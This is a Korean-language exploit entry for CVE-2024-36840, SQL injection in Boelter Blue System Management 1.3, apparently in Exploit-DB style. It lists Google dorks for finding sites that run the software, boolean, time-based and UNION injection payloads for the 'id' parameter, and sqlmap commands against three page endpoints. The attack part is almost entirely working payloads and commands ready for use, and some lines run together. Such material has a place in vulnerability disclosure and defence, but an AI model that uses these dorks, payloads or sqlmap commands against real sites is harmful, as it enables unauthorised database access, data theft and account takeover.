
# CVE-2024-36840 익스플로잇: Boelter Blue System Management의 SQL 인젝션 취약점 (버전 1.3)
익스플로잇 제목: Boelter Blue 시스템 관리(버전 1.3)의 SQL 인젝션 취약점
원본 Google Dork: inurl:"Powered by Boelter Blue" (작동하지 않음(검색 결과 0개))
Theexploiters의 Google Dork: intext:"Powered by Boelter Blue" (작동함)
날짜: 2024-06-04
익스플로잇 작성자: CBKB (DeadlyData, R4d1x)
공급업체 홈페이지: Boelter Blue
소프트웨어 링크: Google Play 스토어
버전: 1.3
테스트 환경: Linux Debian 9 (stretch), Apache 2.4.25, MySQL >= 5.0.12
CVE: CVE-2024-36840
Boelter Blue 시스템 관리(버전 1.3)에서 여러 SQL 인젝션 취약점이 확인되었습니다. 이러한 취약점으로 인해 공격자는 다양한 파라미터를 통해 임의의 SQL 명령을 주입하고 실행할 수 있습니다. 성공적으로 악용될 경우 무단 액세스, 데이터 유출 및 잠재적인 계정 탈취로 이어질 수 있습니다.
파라미터: id (GET)
id=10071 AND 4036=4036유형: 시간 기반 블라인드
id=10071 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)유형: UNION 쿼리
id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,...news_details.php?id
https://www.example.com/news_details.php?id=10071sqlmap -u "https://www.example.com/news_details.php?id=10071" --random-agent --dbms=mysql --threads=4 --dbs
services.php?section
https://www.example.com/services.php?section=5081sqlmap -u "https://www.example.com/services.php?section=5081" --random-agent --tamper=space2comment --threads=8 --dbs
location_details.php?id
https://www.example.com/location_details.php?id=836sqlmap -u "https://www.example.com/location_details.php?id=836" --random-agent --dbms=mysql --dbs